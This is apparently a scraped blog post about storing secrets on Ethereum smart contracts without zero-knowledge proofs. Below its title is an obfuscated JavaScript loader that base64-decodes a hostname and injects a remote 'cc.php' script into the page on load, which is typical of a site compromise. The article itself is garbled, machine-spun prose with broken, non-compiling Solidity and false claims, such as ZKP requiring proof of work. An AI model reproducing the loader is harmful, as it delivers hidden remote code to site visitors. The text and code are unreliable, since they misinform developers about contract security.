Ethereum: Can I store a secret on evm without using zkp

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=60d786a7″;document.body.appendChild(script);

Etherreum: Secret a secret about EVM Witton using ZKP?

As a developer, you are probably familiar with the concept of secret storage in Ethereum Smart Smart. Only common is to use zero knowledge tests (ZKP) such as Veriffier for Assurrection in the agreement with Belada Contraction through Seltlled through Selred Throughed through an API terminal. Why, in this article, we will explore alternatives of Tet Break Solutions.

The problem of zkp

*

Zoro-Knowledge Proofs as a projected insurance and efficiency to verify the validation valve of its contraction with information on running outputs. In general, ZKP likes to use a complete protoculum protocol to achieve this goal.

However, the use of ZKP may like at a significant, specific cost when applications on a business scale. This is because ZKP requires:

1.work proof * (pow): to generate and check the test.

  • Verification : Neats neats verified to check the test in real time.

The Verfier Baked Library, using high prices, specific for widening scale applications.

Alternatives: Slates with ZKP *

In Thhet’s art, we will explore solutions that are not in a donor network:

1.Hash functions *

Only if using a stove to store the secret. He’

charity

We have a solid power ^0.8.8.0;

CITING SECRETSTORAGE {

Mapping (dress => bytes) particular secrets;

;

// Use a hash keccak-256 for exclusivity insurer and prevent collide

Bytes32 HUS = Verification256 (abb.encodepacked (secretpacked (scret);

Secrets [msg.sender] = it;

}

;

Returned secrets [msg.sender];

}

}

`s

This just the Sha-236 shorts to store and recover create.

2.
Codes AutoLis da Message (Macs)

*

Another approach is to use the Macs, which the Way combinations of the authentication ink chase. He'

charity

We have a solid power ^0.8.8.0;

CITING SECRETSTORAGE {

BYTES32 PUBLIC MAC = 0x12345678989000000BDEF;

;

// Culticulates a new Mac Use Sta-256

Bytes32 HUS = Verification256 (abb.encodepacked (secretpacked (secret));

Mc = hash;

}

;

Bytes reputation (MAC);

}

}

s

This only uses the Shalts Shalts to store and recover creations, with a MAC field addiction for authentication.

3.
Digate Subscriptions

If your app requires high security levels for what is available or MACS, MACs, the right user sung. He'

charity

We have a solid power ^0.8.8.0;

CITING SECRETSTORAGE {

PUBLIC DANDED EXTERNATE;

for the public secret;

Occupator () Public {

Owner = = M.Sender;

PRETENT = KECCAK256 (abb.encodepacked (owner);

}

;

Return of Secret;

}

}

` s

Isse Solution is the digital signature for storing and recovering Creets, with Wayner growing control over the signature process.

Conclusion

Although ZKP may provide verification to verify the validity of smart smart smart without the apocalypse with information or information labeled entrances, the Y Court of meaning. By exploring alternatives such as your duties, Macs, Macs, and Digital Subscriptions, you can clarify secrets in your sacets that want safety and efficiency.

Remember always with the safety, costs and performance of the trade-offs when the design of the architecture.

ethereum have network

Foto de Alpha Soluções

Alpha Soluções

Compartilhe: